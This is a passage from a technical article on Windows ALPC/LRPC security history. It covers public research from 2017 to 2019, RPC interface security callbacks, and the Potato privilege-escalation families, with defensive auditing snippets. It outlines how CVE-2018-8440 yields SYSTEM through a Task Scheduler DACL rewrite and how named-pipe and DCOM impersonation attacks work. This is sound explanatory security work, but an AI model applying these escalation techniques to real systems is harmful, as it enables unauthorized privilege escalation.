One consequence of the silent kernel rewiring is that pre-Vista NT 4-era code samples appear to work on Windows 11. A textbook example from a 1996 driver-development book that calls NtCreatePort will link, load, and exchange messages just fine; the messages are travelling over the 2006 ALPC kernel object behind a 1993 syscall name. This is unusual generosity from a kernel team that breaks driver ABIs every few releases, and it is one of the reasons Microsoft has preserved the option not to publish a Nt*Alpc* developer-facing reference: as long as everyone is supposed to use the RPC runtime, the kernel object can keep evolving.

Once the transport was universal, enumeration became valuable. If only LSASS used ALPC, listing LSASS's interfaces by hand was fine. Once every service did, automation was the only tractable methodology. Who built that automation is the subject of the next section.

6. The Eureka Year -- Public Tooling and the Interface-Callback Class (2017-2019)

In the roughly two years between October 2017 and December 2019, four pieces of public research turned ALPC from internal NT plumbing into the most-attacked local-IPC surface in modern Windows. The exemplars were structurally identical: an LRPC server registered an RPC interface with a callback that either was NULL or returned RPC_S_OK for a caller that should have received RPC_S_ACCESS_DENIED. The kernel ALPC layer behaved correctly in every one of them. The application code did not.

gantt
    title Public ALPC and LRPC research, October 2017 to December 2019
    dateFormat YYYY-MM
    section Tooling and disclosure
    PacSec -- A view into ALPC-RPC plus CVE-2017-11783 :2017-10, 1M
    SandboxEscaper -- CVE-2018-8440 0-day on GitHub :2018-08, 1M
    Forshaw -- PPL and COM injection through LRPC :2018-10, 1M
    Ormandy -- CVE-2019-1162 MSCTF disclosure :2019-08, 1M
    Forshaw -- Calling local RPC servers from .NET :2019-12, 1M

The first publication is Clement Rouault and Thomas Imbert's "A view into ALPC-RPC", presented at PacSec in November 2017 [@hakril-pacsec] [@slideshare-pacsec] and at Hack.lu the same season [@youtube-hacklu]. The talk is the first end-to-end mechanical walk of the LRPC-over-ALPC stack to appear at a public security conference, and its deliverable was a working NDR-aware fuzzer named RPCForge [@rpcforge]. RPCForge found CVE-2017-11783 [@nvd-cve-2017-11783], the first publicly acknowledged ALPC elevation-of-privilege issue surfaced by a fuzzer built outside Microsoft. The NVD entry phrases the bug class as "the way it handles calls to Advanced Local Procedure Call (ALPC)" -- the canonical "ALPC EoP" classification that NVD reuses for every later instance.

The second is James Forshaw's NtObjectManager tooling, distributed through the sandbox-attacksurface-analysis-tools repository at Google Project Zero [@forshaw-saatools]. The tooling is a PowerShell module backed by a .NET library originally called NtApiDotNet and renamed to NtCoreLib in 2024. Forshaw introduced the design intent in a December 17, 2019 Project Zero post titled Calling Local Windows RPC Servers from .NET [@forshaw-rpc-2019], opening with what amounts to a personal manifesto: "As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting." The post named a gap in his own methodology -- "one of my big blind spots was anything which directly interacted with a Local RPC server" -- and introduced Get-RpcServer, Get-NtAlpcServer, and New-RpcClient as the cmdlets that closed it.

As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting. -- James Forshaw, *Calling Local Windows RPC Servers from .NET*, Project Zero, December 17, 2019 [@forshaw-rpc-2019]

The conceptual workflow Forshaw's tooling enables is short enough to fit on one screen. Enumerate every DLL on the system that contains RPC interface metadata. Parse the metadata to recover the IDL-equivalent description of each interface -- the UUID, the version, the procedures, the parameter types. Filter to the ones bound to a local-only protocol sequence. The result is an inventory of "every local RPC procedure callable on this Windows install." Diff the inventory across a Patch Tuesday and the changes -- new procedures, retired procedures, changed security descriptors -- become a research backlog.

{`
// PowerShell equivalent (run inside an elevated session with NtObjectManager installed).
// Get-RpcServer parses the DLLs piped into it, so the pipeline starts from a file listing:
//   Install-Module NtObjectManager
//   Get-ChildItem "$env:SystemRoot\\System32\\*.dll" |
//     Get-RpcServer -DbgHelpPath 'C:\\Program Files\\Debugging Tools for Windows\\dbghelp.dll' |
//     Where-Object { $_.Endpoints.ProtocolSequence -eq 'ncalrpc' } |
//     Select-Object Name, InterfaceId, @{N='ProcCount';E={$_.Procedures.Count}}

// The runnable below mirrors the same logic in plain JS so the in-browser engine can execute it.
// Procedure counts are illustrative.
const interfaces = [
  { name: 'AppInfo', interfaceId: '201ef99a-7fa0-444c-9399-19ba84f12a1a', protocolSequence: 'ncalrpc', procedures: 12 },
  { name: 'schrpc', interfaceId: '86d35949-83c9-4044-b424-db363231fd0c', protocolSequence: 'ncalrpc', procedures: 27 },
  { name: 'spoolss', interfaceId: '12345678-1234-abcd-ef00-0123456789ab', protocolSequence: 'ncacn_np', procedures: 96 },
  { name: 'lsarpc-local', interfaceId: '12345778-1234-abcd-ef00-0123456789ab', protocolSequence: 'ncalrpc', procedures: 81 },
  { name: 'epmapper', interfaceId: 'e1af8308-5d1f-11c9-91a4-08002b14a0fa', protocolSequence: 'ncalrpc', procedures: 5 },
];

// Keep only the interfaces bound to the local-only protocol sequence.
const local = interfaces
  .filter(i => i.protocolSequence === 'ncalrpc')
  .map(i => ({ name: i.name, interfaceId: i.interfaceId, procCount: i.procedures }));

console.log('Local RPC interfaces (ncalrpc only):');
local.forEach(i => console.log(` ${i.name.padEnd(16)} ${i.interfaceId} procs=${i.procCount}`));
console.log(`Total: ${local.length}`);
`}
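The last step of that workflow, diffing the inventory across a Patch Tuesday, can be sketched in the same plain-JS style as the runnable example above. This is a minimal sketch under stated assumptions: the snapshot shape, the `diffInventories` helper, the procedure names, and the SDDL strings are all hypothetical, and a real inventory would come from the NtObjectManager output rather than hand-written arrays.

```javascript
// Hypothetical snapshots of the local RPC inventory taken before and after a patch.
// Interface IDs reuse the UUIDs from the runnable example above; procedure names
// and security descriptors are made up for illustration.
const beforePatch = [
  { interfaceId: '201ef99a-7fa0-444c-9399-19ba84f12a1a', procedures: ['ProcA', 'ProcB'], securityDescriptor: 'D:(A;;GA;;;WD)' },
  { interfaceId: '86d35949-83c9-4044-b424-db363231fd0c', procedures: ['ProcX', 'ProcY'], securityDescriptor: 'D:(A;;GA;;;WD)' },
];
const afterPatch = [
  { interfaceId: '201ef99a-7fa0-444c-9399-19ba84f12a1a', procedures: ['ProcA', 'ProcB', 'ProcC'], securityDescriptor: 'D:(A;;GA;;;WD)' },
  { interfaceId: '86d35949-83c9-4044-b424-db363231fd0c', procedures: ['ProcX'], securityDescriptor: 'D:(A;;GA;;;AU)' },
];

// Report new, retired, and changed entries between two snapshots.
function diffInventories(before, after) {
  const index = list => new Map(list.map(i => [i.interfaceId, i]));
  const oldById = index(before);
  const newById = index(after);
  const changes = [];

  for (const [id, cur] of newById) {
    const prev = oldById.get(id);
    if (!prev) {
      changes.push({ interfaceId: id, kind: 'new-interface' });
      continue;
    }
    const added = cur.procedures.filter(p => !prev.procedures.includes(p));
    const retired = prev.procedures.filter(p => !cur.procedures.includes(p));
    if (added.length) changes.push({ interfaceId: id, kind: 'new-procedures', procedures: added });
    if (retired.length) changes.push({ interfaceId: id, kind: 'retired-procedures', procedures: retired });
    if (prev.securityDescriptor !== cur.securityDescriptor) {
      changes.push({ interfaceId: id, kind: 'changed-security-descriptor' });
    }
  }
  for (const id of oldById.keys()) {
    if (!newById.has(id)) changes.push({ interfaceId: id, kind: 'retired-interface' });
  }
  return changes;
}

const backlog = diffInventories(beforePatch, afterPatch);
backlog.forEach(c => console.log(`${c.kind.padEnd(28)} ${c.interfaceId} ${(c.procedures || []).join(',')}`));
```

Each entry in `backlog` is a candidate for manual review; the diff says where the interface surface moved, not whether the change is a fix or a new bug.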

The third publication is SandboxEscaper's CVE-2018-8440 [@nvd-cve-2018-8440], dropped as a 0-day on GitHub on August 27, 2018, and triaged by CERT/CC as VU#906424 on August 28 with the note that the vulnerability was "being exploited in the wild" [@cert-vu906424]. The 0patch team published a micropatch within days and walked the bug specifics [@0patch-micropatch]. The structural shape of the bug is canonical and is worth tracing carefully.

sequenceDiagram
    participant Att as Unprivileged attacker process
    participant Sch as Task Scheduler ALPC port \RPC Control\atsvc
    participant Srv as schedsvc.dll worker thread (SYSTEM)
    participant FS as Target file -- C:\WINDOWS\System32\example.dll
    Att->>Sch: NtAlpcConnectPort plus LRPC SchRpcSetSecurity request
    Sch->>Srv: dispatch -- IfCallbackFn is NULL, no security callback runs
    Srv->>FS: SetSecurityInfo as SYSTEM, grant Everyone:F to attacker-chosen path
    Srv->>Att: RPC_S_OK
    Att->>FS: overwrite the now-writable file
    Note over Att,FS: next call into the modified binary executes attacker code as SYSTEM

The Task Scheduler service exposes an LRPC interface containing a procedure named SchRpcSetSecurity, registered through RpcServerRegisterIf2 with IfCallbackFn set to NULL. NULL has a specific meaning, documented verbatim on Microsoft Learn: "IfCallbackFn: Security-callback function, or NULL for no callback" [@msdocs-rpcregisterif2]. No callback means the RPC runtime dispatches the call without asking the application whether the caller should be allowed.

Once dispatched, SchRpcSetSecurity running in the SYSTEM-context Task Scheduler worker thread set a permissive DACL on a file the attacker specified. The attacker chose a file the attacker did not have write access to. The SYSTEM-context service made it writable. The attacker then wrote attacker-controlled bytes into the file, triggered execution, and inherited SYSTEM.

The 0patch micropatch writeup named the structural pattern as "the Task Scheduler fails to impersonate the requesting client" [@0patch-micropatch] -- which is to say, the service did the operation in its own privileged identity instead of the caller's. CERT/CC framed the same bug in transport terms: a vulnerability "in the handling of ALPC" that lets an authenticated user overwrite an arbitrary file [@cert-vu906424].

Note: A NULL IfCallbackFn is the canonical elevation-of-privilege-by-default bug shape. Microsoft Learn documents it as a legal value [@msdocs-rpcregisterif2], and the runtime accepts it without warning. Every notable LRPC EoP since 2017 either left the callback NULL or registered a callback whose body said the wrong thing. Defenders auditing in-house LRPC services should treat any RpcServerRegisterIf2(..., NULL) in production code as a finding.
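A first-pass audit for that finding can be approximated with a text scan. The sketch below is a heuristic, not a parser: the `findNullCallbackRegistrations` helper is hypothetical, it only catches a literal `NULL`, `nullptr`, or `0` in the seventh argument position, and it will miss callbacks passed through variables or calls whose arguments contain commas inside strings or `//` comments.

```javascript
// Heuristic scanner: flags RpcServerRegisterIf2 / RpcServerRegisterIf3 calls whose
// seventh argument (IfCallbackFn) is a literal NULL, nullptr, or 0.
function findNullCallbackRegistrations(source) {
  const findings = [];
  const callRe = /\bRpcServerRegisterIf[23]\s*\(/g;
  let match;
  while ((match = callRe.exec(source)) !== null) {
    // Split the argument list on top-level commas, tracking nested parentheses.
    const args = [];
    let depth = 1;
    let current = '';
    for (let i = callRe.lastIndex; i < source.length; i++) {
      const ch = source[i];
      if (ch === '(') depth++;
      if (ch === ')' && --depth === 0) break;
      if (ch === ',' && depth === 1) {
        args.push(current);
        current = '';
      } else {
        current += ch;
      }
    }
    args.push(current);
    // Drop /* ... */ comments and whitespace so "/* IfCallbackFn */ NULL" still matches.
    const callback = (args[6] || '').replace(/\/\*[\s\S]*?\*\//g, '').trim();
    if (/^(NULL|nullptr|0)$/.test(callback)) {
      const line = source.slice(0, match.index).split('\n').length;
      findings.push({ line, call: match[0].replace(/\s*\($/, '') });
    }
  }
  return findings;
}

// Illustrative C source; the interface and callback names are made up.
const sample = [
  'status = RpcServerRegisterIf2(Example_v1_0_s_ifspec, NULL, NULL,',
  '    RPC_IF_ALLOW_LOCAL_ONLY, RPC_C_LISTEN_MAX_CALLS_DEFAULT,',
  '    (unsigned)-1, NULL);',
  'status = RpcServerRegisterIf2(Other_v1_0_s_ifspec, NULL, NULL,',
  '    RPC_IF_ALLOW_LOCAL_ONLY, RPC_C_LISTEN_MAX_CALLS_DEFAULT,',
  '    (unsigned)-1, OtherSecurityCallback);',
].join('\n');

console.log(findNullCallbackRegistrations(sample));
```

A hit is a prompt to read the registration and the port DACL together, since a NULL callback on a tightly restricted port may be a deliberate choice.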

The fourth is Tavis Ormandy's CVE-2019-1162 [@nvd-cve-2019-1162], disclosed in the August 13, 2019 Project Zero post Down the Rabbit-Hole... [@ormandy-ctf-2019]. The bug class Ormandy named is the structural exemplar of "shared system ALPC ports that ignore caller integrity." The Microsoft Text Services Framework (MSCTF) shipped a global ALPC port -- present since Windows XP in 2001 -- that any process on the desktop could open regardless of integrity level. The CTF subsystem trusted clients to identify themselves correctly in the messages they sent; the protocol had no integrity-level check or AppContainer enforcement. A low-integrity browser process could send messages that impersonated a high-integrity privileged process, and the CTF service would honour them. The fix narrowed the specific instance and left the general class of "shared ALPC ports without caller-integrity enforcement" open.

A partially-overlapping fifth example -- the same interface-callback class expressed through DCOM activation rather than direct LRPC -- is Forshaw's October 18, 2018 Project Zero post Injecting Code into Windows Protected Processes using COM [@forshaw-com-ppl-2018]. The post documented a class of Protected Process Light (PPL) bypass in which a DCOM activator marshalled an impersonated client token into a privileged COM server, and the server's interface callback trusted the marshalled identity too early in the dispatch flow. The kernel ALPC layer is doing exactly what the spec says; the bug is in the user-mode interface code that interprets the message.

Before `NtObjectManager`, a researcher looking at an LRPC service had to disassemble the service's DLL by hand, locate the calls to `RpcServerRegisterIf2`, read out the interface UUID and procedure-table pointer, parse the MIDL-generated stub manually, and assemble enough information to send a single well-formed call. After `NtObjectManager`, the same workflow was a one-line PowerShell pipeline. The methodology change cascaded into the Patch-Tuesday cycle. Differential analysis on the RPC interface inventory across a single Patch Tuesday became a research workflow that a small team could run in a single afternoon. Forshaw's December 2019 post named it explicitly: he wrote the tools because the tools were the bottleneck.

Interface security callback: The application-supplied function whose pointer is passed as the `IfCallbackFn` argument to `RpcServerRegisterIf2` [@msdocs-rpcregisterif2] or `RpcServerRegisterIf3` [@msdocs-rpcregisterif3]. The RPC runtime invokes the callback after the port-level access check passes and before the call is dispatched to the IDL-named procedure. The callback inspects the binding handle, the calling user's token, the integrity level, and any other attribute the application chooses to consult. The callback returns `RPC_S_OK` to permit the call or any other status code to reject it. A NULL callback pointer is documented as a legal value and means "permit every call that reaches the runtime."

NDR and NDR64: The wire format that LRPC payloads marshal through. NDR is the original 32-bit Network Data Representation transfer syntax used by DCE/RPC; NDR64 is the 64-bit extension Microsoft introduced for 64-bit Windows [@msdocs-ndr64]. Local LRPC and remote MSRPC use the same transfer syntax; the only difference is that local calls travel inside an ALPC `PORT_MESSAGE` body rather than over a TCP or named-pipe transport.

By the end of 2019, the inventory was visible, the bug class had been named, and four worked exemplars had been published. The mechanism underneath -- what an interface-registration callback actually is, why the OS cannot enforce its correctness -- is what the next section unpacks.

The deeper realisation is that none of these are kernel bugs. The kernel ALPC layer behaved correctly in every one; the bugs live in the user-mode interface-callback layer that Section 7 walks next.

7. The LRPC Overlay -- Interface Registration and the Asymmetry the OS Cannot Fix

Look at the signature of RpcServerRegisterIf2. The seventh parameter is named IfCallbackFn. Microsoft's own reference page documents that NULL is a legal value, and that NULL means "no callback" [@msdocs-rpcregisterif2]. That parameter is the asymmetry the rest of this section is about.

A canonical server-side LRPC startup sequence looks like this. The service compiles an IDL file with MIDL; MIDL emits an RPC_SERVER_INTERFACE structure that pins down the interface's UUID, version, and procedure table. The service calls RpcServerUseProtseqEp with the protocol sequence "ncalrpc", an endpoint name, and a security descriptor; that call asks the kernel, by way of the RPC runtime, to create an ALPC connection port at the requested name under \RPC Control. The service calls RpcServerRegisterIf2 or, since Windows 8, RpcServerRegisterIf3 [@msdocs-rpcregisterif3]. The newer call additionally accepts a per-interface security descriptor that the runtime enforces before consulting the callback. Both calls store the IDL spec, the interface-registration flags, and the per-interface security callback. Finally the service calls RpcServerListen, and worker threads in the RPC runtime block inside NtAlpcSendWaitReceivePort.

Per call, the dispatch sequence is: accept the inbound ALPC connection, read the NDR-encoded request from the message body, invoke the registered security callback (if any), dispatch to the MIDL-generated server stub, and marshal the reply back.

sequenceDiagram
    participant Client as Client stub (rpcrt4.dll, user mode)
    participant Kernel as Kernel ALPC dispatcher
    participant Worker as Server worker thread (rpcrt4.dll, user mode)
    participant Cb as Interface security callback (application code)
    participant Stub as MIDL-generated server stub (application code)
    Client->>Kernel: NtAlpcSendWaitReceivePort (REQUEST with NDR body)
    Kernel->>Worker: deliver message to blocked worker
    Worker->>Cb: invoke IfCallbackFn (if registered)
    Cb->>Worker: return RPC_S_OK or RPC_S_ACCESS_DENIED
    Worker->>Stub: dispatch to MIDL procedure (if callback returned OK)
    Stub->>Worker: result returned through NDR encoder
    Worker->>Kernel: NtAlpcSendWaitReceivePort (REPLY)
    Kernel->>Client: deliver reply

The kernel's job ends at "deliver the message to a worker thread." Everything after that is application code. The RPC runtime is a DLL that the service loads into its own address space, and the runtime's notion of authorization is whatever the callback returns. If the callback returns RPC_S_OK, the call proceeds. If the callback is NULL, the call proceeds without ever asking the application. The kernel has no notion of "this call requires SeImpersonatePrivilege" or "this call requires the caller to be in the local Administrators group", because those notions are policy choices the application makes, not properties of the IPC primitive.
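The user-mode half of that sequence is small enough to model directly. The sketch below is a toy, not the rpcrt4.dll implementation: the `dispatch` function, the interface objects, and the caller shape are hypothetical, and only the two status values (`RPC_S_OK` as 0, `RPC_S_ACCESS_DENIED` as 5) match the real Windows constants.

```javascript
const RPC_S_OK = 0;
const RPC_S_ACCESS_DENIED = 5;

// Toy model of the runtime's per-call decision after the kernel has delivered the message.
function dispatch(iface, call) {
  // A registered callback is the only place the application gets to say no.
  if (iface.ifCallbackFn !== null) {
    const status = iface.ifCallbackFn(call.caller);
    if (status !== RPC_S_OK) return { status, result: null };
  }
  // With a NULL callback, control reaches the procedure without any question being asked.
  const procedure = iface.procedures[call.procNum];
  return { status: RPC_S_OK, result: procedure(...call.args) };
}

// One privileged procedure, shared by both registrations below.
const procedures = [path => `DACL on ${path} rewritten as SYSTEM`];

const guarded = {
  ifCallbackFn: caller => (caller.isAdmin ? RPC_S_OK : RPC_S_ACCESS_DENIED),
  procedures,
};
const unguarded = { ifCallbackFn: null, procedures };

const lowPrivCall = {
  caller: { name: 'alice', isAdmin: false },
  procNum: 0,
  args: ['C:\\example\\target.dll'],
};

console.log(dispatch(guarded, lowPrivCall));   // status 5, procedure never runs
console.log(dispatch(unguarded, lowPrivCall)); // status 0, procedure runs for the low-privilege caller
```

The two registrations differ by a single field, which is the point: nothing outside the application can tell which of them was intended.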

Endpoint mapper: The RPC service-discovery primitive at the well-known ALPC port `\RPC Control\epmapper`. An LRPC client that knows the interface UUID it wants to call -- but not which endpoint name a particular service is listening on -- calls into the endpoint mapper, hands over the UUID, and gets back the endpoint name. The mapper is itself an LRPC service; it bootstraps the rest. `rpcss` (the DCOM activator service) hosts the endpoint mapper on every Windows install.

MIDL (Microsoft Interface Definition Language): The Microsoft dialect of OSF DCE IDL used to declare RPC interfaces. An `.idl` file pins down the interface UUID, version, methods, and parameter types; the MIDL compiler produces three artifacts: a header for both client and server, a client-side stub that marshals call arguments into NDR, and a server-side stub that unmarshals NDR back into call arguments and dispatches to the application's implementation.

The interface-registration flag inventory tells the same story from a different angle. Microsoft Learn enumerates the flags on a single reference page [@msdocs-ifflags]; the four that matter for this section are quoted verbatim from that page.

| Flag | What Microsoft says it does | What it closes | What it leaves open |
| --- | --- | --- | --- |
| `RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH` | "the RPC runtime invokes the registered security callback for all calls, regardless of identity, protocol sequence, or authentication level of the client" | Forces the callback to run even for unauthenticated calls | The correctness of the callback's return value |
| `RPC_IF_ALLOW_SECURE_ONLY` | rejects callers that did not authenticate at the runtime's minimum authentication level | Unauthenticated callers | Authenticated-but-unauthorized callers; Microsoft notes verbatim that "Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user" [@msdocs-ifflags] |
| `RPC_IF_SEC_NO_CACHE` | "Disables security callback caching, forcing a security callback for each RPC call on a given interface" | Stale cached approval after a token-state change | The correctness of the callback's body |
| `RPC_IF_ALLOW_LOCAL_ONLY` | rejects remote callers at the runtime layer | Cross-machine reachability | Local elevation primitives |

The table is the argument. Every flag closes a specific known-bad pattern. No flag changes the fact that the per-interface authorization decision is application code. The runtime can be configured to force the callback to run. It cannot be configured to make the callback return the right answer.

Key idea: Port-level security is kernel infrastructure. Interface-level security is application code. The kernel can enforce the first; it cannot enforce the second. Everything in the rest of this article follows from that asymmetry.

Note: Microsoft Learn's verbatim note on IfCallbackFn reads: "Security-callback function, or NULL for no callback. Each registered interface can have a different callback function." [@msdocs-rpcregisterif2] A NULL callback means "anyone who can open the connection port can call any procedure on this interface." Many in-house services interpret the parameter as if NULL meant "default deny." It does not. NULL is a default allow, gated only by the port DACL. The CVE-2018-8440 SchRpcSetSecurity disclosure [@cert-vu906424] [@0patch-micropatch] is the canonical example of what that interpretation costs.

RpcServerRegisterIf3, introduced in Windows 8 [@msdocs-rpcregisterif3], partially mitigates the structural concern by adding a per-interface security descriptor argument the runtime checks before the callback runs. Microsoft Learn documents the order: "If both SecurityDescriptor and IfCallbackFn are specified, the security descriptor in SecurityDescriptor will be checked first and the callback in IfCallbackFn will be called after the access check against the security descriptor passes." The If3 API also bakes in an AppContainer default-deny: in the absence of an explicit security descriptor, the runtime refuses calls from AppContainer processes. These are real defences. They do not change the underlying property that the per-call authorization decision -- the one that says "this caller is allowed to invoke this procedure with these arguments" -- is delegated to an application function the kernel cannot inspect.
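The ordering described above can be modelled in a few lines. This is a sketch of the behaviour as this section describes it, not of the runtime's internals: the `authorizeIf3` function is hypothetical, and a real security descriptor is an ACL evaluated by an access check, reduced here to a list of allowed group names.

```javascript
const RPC_S_OK = 0;
const RPC_S_ACCESS_DENIED = 5;

// Toy model of the If3 ordering: descriptor first, callback second.
function authorizeIf3(registration, caller) {
  const { securityDescriptor, ifCallbackFn } = registration;
  if (securityDescriptor) {
    // Stand-in for the access check against the per-interface security descriptor.
    const granted = caller.groups.some(g => securityDescriptor.allowedGroups.includes(g));
    if (!granted) return RPC_S_ACCESS_DENIED;
  } else if (caller.isAppContainer) {
    // No explicit descriptor: AppContainer callers are refused by default.
    return RPC_S_ACCESS_DENIED;
  }
  // The callback runs only after the descriptor check has passed.
  if (ifCallbackFn) return ifCallbackFn(caller);
  return RPC_S_OK;
}

let callbackRuns = 0;
const registration = {
  securityDescriptor: { allowedGroups: ['Administrators'] },
  ifCallbackFn: () => { callbackRuns++; return RPC_S_OK; },
};
const user = { groups: ['Users'], isAppContainer: false };
const admin = { groups: ['Administrators'], isAppContainer: false };
const sandboxed = { groups: ['Users'], isAppContainer: true };
const bare = { securityDescriptor: null, ifCallbackFn: null };

console.log(authorizeIf3(registration, user), callbackRuns);  // 5 0 -- callback never consulted
console.log(authorizeIf3(registration, admin), callbackRuns); // 0 1 -- callback ran once
console.log(authorizeIf3(bare, sandboxed));                   // 5 -- AppContainer default-deny
console.log(authorizeIf3(bare, user));                        // 0 -- still a default allow otherwise
```

The last line is the residue the section is concerned with: the descriptor narrows who reaches the callback, and the callback's verdict is still whatever the application wrote.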

The kernel-vs-application boundary inside rpcrt4.dll is unusual and easy to miss. The same DLL contains both the user-mode side of the kernel ALPC syscall surface (the thin wrappers around NtAlpcSendWaitReceivePort that the runtime threads call) and the interface dispatch loop that ends in the application callback. Both halves run inside the service process; both halves are user-mode code from the kernel's point of view. The kernel does not know which RPC interface a given ALPC message is going to dispatch to. It just hands the message to a worker thread and forgets.

The endpoint-mapper bootstrap path is the other piece of the LRPC overlay worth naming. A client that knows the interface UUID it wants to talk to -- say, the AppInfo interface UUID for UAC -- but does not know which endpoint name appinfo happens to be listening on, opens the well-known ALPC port \RPC Control\epmapper, sends a query containing the UUID, and gets back the endpoint name. The endpoint mapper is itself an LRPC service running inside rpcss. It bootstraps the rest of the local-IPC fabric.
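As a rough mental model, the endpoint mapper behaves like a lookup table keyed by interface UUID. The sketch below assumes exactly that and nothing more: the `resolveEndpoint` helper and the endpoint name are hypothetical, and the real mapper is queried over RPC rather than read from a local map.

```javascript
// Toy endpoint mapper: interface UUID -> endpoint name registered by the server.
// The UUID is the AppInfo interface ID used earlier; the endpoint name is made up.
const endpointMapper = new Map([
  ['201ef99a-7fa0-444c-9399-19ba84f12a1a', 'LRPC-hypothetical-appinfo-endpoint'],
]);

// Resolve a UUID to the Object Manager path of the ALPC connection port.
function resolveEndpoint(interfaceId) {
  const endpoint = endpointMapper.get(interfaceId.toLowerCase());
  if (!endpoint) throw new Error(`no endpoint registered for ${interfaceId}`);
  return `\\RPC Control\\${endpoint}`;
}

console.log(resolveEndpoint('201EF99A-7FA0-444C-9399-19BA84F12A1A'));
```

The client only needs the UUID and the mapper's well-known port name up front; everything else is discovered at call time.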

NDR and NDR64 are the wire format. NdrClientCall3 on the client side packs the call arguments into the NDR representation Microsoft documents on Learn [@msdocs-ndr64]; the bytes ride inside an ALPC PORT_MESSAGE body to the server; NdrStubCall3 on the server side unpacks them. The same NDR format that travels over a TCP socket for cross-machine MSRPC travels through an ALPC port for local LRPC. The transport is the only thing that differs.

The intuitive question -- "if the callback is the problem, why doesn't the kernel just check it?" -- bumps into two impossibility results. First, the callback is a function pointer into application code. The kernel cannot symbolically execute the function to determine whether its return value is correct; that is a halting-problem-shaped task in the general case. Second, even if the kernel could execute the function, the kernel does not know what "correct" means for an arbitrary application's authorization policy. "Correct" is the application's specification of who should be allowed to call what, and the application is the only party that has that specification. Closing the gap requires either a new ABI in which the application declares its authorization policy in a language the OS can validate, or a runtime sandbox that confines what the callback can do. Neither has been proposed as a stable Microsoft direction in any public artefact.

The structural punchline is that the RPC runtime is application code -- the callback runs in user mode in the server's address space, the runtime trusts whatever the callback returns, and the OS cannot validate the callback's body. The CVE-2019-1162 MSCTF disclosure [@ormandy-ctf-2019] and the local-COM-over-LRPC PPL-bypass class [@forshaw-com-ppl-2018] are both structural instances of this asymmetry; no kernel change could have prevented them.

That asymmetry is the engine. Almost every CVE on the Patch-Tuesday treadmill since 2018 -- the Task Scheduler ACL bug, the CTF subsystem disclosure, the PPL-COM bypasses, the Potato-family activations -- is structurally the same shape. Some are LRPC bugs. Some are not. The next section explains which is which.

8. Competing Approaches -- Named Pipes, COM, Filter Ports, and the Potato Disambiguation

Roughly half the time a defender reads "Potato" in a CVE writeup, the underlying primitive is not ALPC. The other half of the time, it is. Confusing the two is a common reason defenders mis-classify privilege-escalation attacks. The disambiguation matters because the mitigations differ: an LRPC-on-ALPC Potato is closed (or worsened) by RPC interface-flag changes; a named-pipe Potato is closed (or worsened) by SeImpersonatePrivilege policy.

Before the Potato classification, four local-IPC primitives sit alongside LRPC-on-ALPC and deserve a brief tour.

Named pipes [@msdocs-protseq] [@msdocs-impnp] [@csandker-np] are the first-class alternative that works both locally and across machines over SMB. The Windows RPC runtime supports an ncacn_np (Network Computing Architecture, Connection-oriented, Named Pipe) protocol sequence that lets an RPC interface be reached either through \\.\pipe\name locally or through an SMB tree-connect remotely. The load-bearing security primitive for the named-pipe-Potato class is ImpersonateNamedPipeClient [@msdocs-impnp], a Win32 API that lets the server end of a named pipe impersonate the client; obtaining a usable impersonation token this way requires the server to hold SeImpersonatePrivilege. The privilege is granted by default to LocalSystem, LocalService, NetworkService, and to any other account assigned the user right through policy. The named-pipe-Potato attack pattern is "a privileged service, typically running as SYSTEM, is tricked into connecting to a named pipe the attacker controls, and the attacker, who already holds SeImpersonatePrivilege, calls ImpersonateNamedPipeClient to take on the service's token."

SeImpersonatePrivilege: The Windows user right that permits a thread to impersonate another security principal -- specifically by calling APIs such as `ImpersonateNamedPipeClient` [@msdocs-impnp] or `ImpersonateLoggedOnUser`. The privilege is granted by default to `LocalSystem`, `NetworkService`, `LocalService`, and processes started by the Service Control Manager. As Clement Labro summarised the practical implication: *"if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM"* [@itm4n-printspoofer], because every interactive way to use either privilege ends in a SYSTEM token under the right circumstances. The named-pipe-Potato family exploits exactly this fact.

OXID resolver: The DCOM lookup primitive that translates an object exporter identifier (OXID) to a string binding (a protocol sequence plus an endpoint) where the corresponding COM server is listening. By default the OXID resolver runs in `rpcss` on TCP port 135. RoguePotato [@roguepotato-blog] [@roguepotato-repo] -- the post-Windows-10-1809 evolution of the Potato family -- redirects an outbound OXID-resolver query to an attacker-controlled host, which lets the attacker substitute an arbitrary endpoint and, through that, an arbitrary impersonation token.

Shared sections plus events is the lowest-level local-IPC pattern. Two processes call NtCreateSection to back the same shared memory, then synchronise with kernel events or semaphores. There is no framing, no caller-identity primitive, and no message boundary. The pattern is used in performance-sensitive contexts such as browser sandboxes and DirectX swapchain handoff; it is not a competitor with LRPC-on-ALPC for general request-reply use cases.

COM local activation [@forshaw-com-ppl-2018] [@roguepotato-blog] is not a competitor. It is a higher-level overlay. The DCOM activation service (rpcss) takes a CoCreateInstance-style activation request and, for local activations, marshals into LRPC under the hood. This is why DCOM-activation attacks are also LRPC attacks: the trigger transport is DCOM, but the impersonation primitive ends up being the LRPC RpcImpersonateClient machinery that runs inside the activated server.

Filter Communication Ports [@msdocs-minifilter-replacement] [@msdocs-fltsendmessage] are the minifilter-specific IPC channel for talking between a kernel-mode file-system filter driver and a user-mode service. A minifilter calls FltCreateCommunicationPort to set up the server side; a user-mode application calls FilterConnectCommunicationPort to attach to it; the kernel-side FltSendMessage and the user-side FilterReplyMessage carry payloads in either direction. Filter Communication Ports are a separate primitive from ALPC and live in their own namespace; the only reason to mention them in this section is that defenders sometimes conflate "any named local IPC endpoint" with ALPC, and they should not.

Now the Potato disambiguation. The Potato family is the loudest local-EoP cluster of the last decade, and the family contains two structurally different sub-families that share the surname for historical reasons.

| Axis | DCOM-activation Potato | Named-pipe Potato |
| --- | --- | --- |
| Triggering protocol | DCOM `CoGetInstanceFromIStorage` activation against `127.0.0.1` plus the local OXID resolver | Service connects out to a named pipe controlled by the attacker (often via UNC or by tricking a print or EFS hook) |
| Impersonation primitive | `RpcImpersonateClient` invoked by the activated COM server during the LRPC dispatch | `ImpersonateNamedPipeClient` invoked by the attacker on the receiving end of the pipe |
| Required attacker privilege | `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` | `SeImpersonatePrivilege` plus the ability to direct the service to connect to the attacker's pipe |
